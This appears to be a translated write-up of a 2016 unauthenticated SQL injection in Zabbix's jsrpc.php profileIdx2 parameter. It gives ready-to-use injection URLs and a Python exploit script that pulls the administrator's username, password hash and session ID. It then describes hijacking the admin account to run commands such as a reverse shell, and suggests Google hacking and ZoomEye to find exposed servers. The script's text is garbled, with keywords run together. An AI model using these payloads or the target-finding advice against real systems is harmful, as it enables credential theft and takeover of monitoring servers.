zabbix-20160817-high-risk SQL injection Vulnerability

Vulnerability Overview:

Zabbix is an open source enterprise-class performance monitoring solution. Recently, Zabbix's jsrpc profileIdx2 parameter has the Insert method SQL injection vulnerability, the attacker does not need to authorize the login to log on the Zabbix management system, but also can easily obtain the Zabbix server's operating system permission directly through the script and so on function. But there is no need to login to inject here is a premise, that is, Zabbix opened the guest permissions. In Zabbix, the default password for guest is null. Support for this condition is required to allow for no-permission injection.

Degree of impact:

Attack Cost: Low

Hazard Level: High

Whether to login: no

Impact Range:2.2.x, 3.0.0-3.0.3. (Other versions untested)

Vulnerability testing:

Add the following URL after your Zabbix address:

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pagefile=history.php&profileidx= Web.item.graph&profileidx2=1+or+updatexml (1,MD5 (0x11), 1) +or+1=1)%23&updateprofile=true&period=3600 &stime=20160817050632&resourcetype=17

The output is as follows to indicate that the vulnerability exists:

　　　　

Version: 2.4.6 There are also vulnerabilities

Exploit:

　　An attacker could make a further construction statement for the wrong type of SQL injection without acquiring and cracking an encrypted administrator password.

An experienced attacker can construct a SID based on the structure algorithm directly by obtaining the SessionID of the admin, and the replacement cookie is logged directly as an administrator.

　　Using code :

/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.getxtamp=1471403798083&mode=2&screenid= &groupid=&hostid=0&pagefile=history.php&profileidx=web.item.graph&profileidx2= (Updatexml ( 0X5E, (MD5 (0x313233)), 0x5e)) &updateprofile=true&screenitemid=&period=3600&stime=20160817050632 &resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_ Color=1

Get admin cookie and password, can log in Zabbix Monitor system as Administrator, take advantage of admin script function, make Zabbix monitor server execute malicious command (ex: Bounce shell, etc.)

Exploit tool:

#!/usr/bin/env python#-*-CODING:GBK-*-#DATE:2016/8/18ImportUrllib2Importsys, OSImportRedefdeteck_sql (): U'Check if SQL injection is present'Payload="jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2 &screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph& profileidx2=999 ' &updateProfile=true&screenitemid=&period=3600&stime=20160817050632& Resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_color =1"    Try: Response= Urllib2.urlopen (url + payload, timeout=10). Read ()exceptException, msg:PrintmsgElse: Key_reg= Re.compile (r"Insert\s*into\s*profiles")        ifKey_reg.findall (response):returnTruedefsql_inject (SQL): U'get the content of a specific SQL statement'Payload= URL +"jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2 &screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph& Profileidx2="+urllib2.quote (SQL)+"&updateprofile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17 &itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"    Try: Response= Urllib2.urlopen (Payload, timeout=10). Read ()exceptException, msg:PrintmsgElse: Result_reg= Re.compile (r"duplicate\s*entry\s* ' ~ (. +?) to") Results=Result_reg.findall (response)ifResults:returnResults[0]if __name__=='__main__':    #Os.system ([' Clear ', ' cls '][os.name = = ' nt '])    Print '+'+'-'* 60 +'+'    Print '\ t Python zabbix<3.0.4 SQL injection Exploit'    Print '\t\t time:2016-08-18'    Print '+'+'-'* 60 +'+'    ifLen (SYS.ARGV)! = 2:        Print 'Usage:'+ Os.path.basename (sys.argv[0]) +'Zabbix website Address'        Print 'Example:'+ Os.path.basename (sys.argv[0]) +'http://www.waitalone.cn/'sys.exit () URL= Sys.argv[1]    ifURL[-1]! ='/': URL + ='/'Passwd_sql="(select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e, select Concat (NAME,0X3A,PASSWD) from Users limit 0,1), 0x7e)) (Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)"Session_sql="(select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e, select SessionID from Sessions limit 0,1), 0x7e)) (from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by x)"    ifdeteck_sql ():PrintU'Zabbix There is a SQL injection vulnerability!\n'        PrintU'Administrator user name password:%s'%Sql_inject (passwd_sql)PrintU'Administrator session_id:%s'%Sql_inject (session_sql)Else:        PrintU'Zabbix There is no SQL injection Vulnerability!\n'

Vulnerability Mining:

Google hacking

Zoom Eye

Search the interface of the monitoring system on the external network

zabbix-20160817-high-risk SQL injection Vulnerability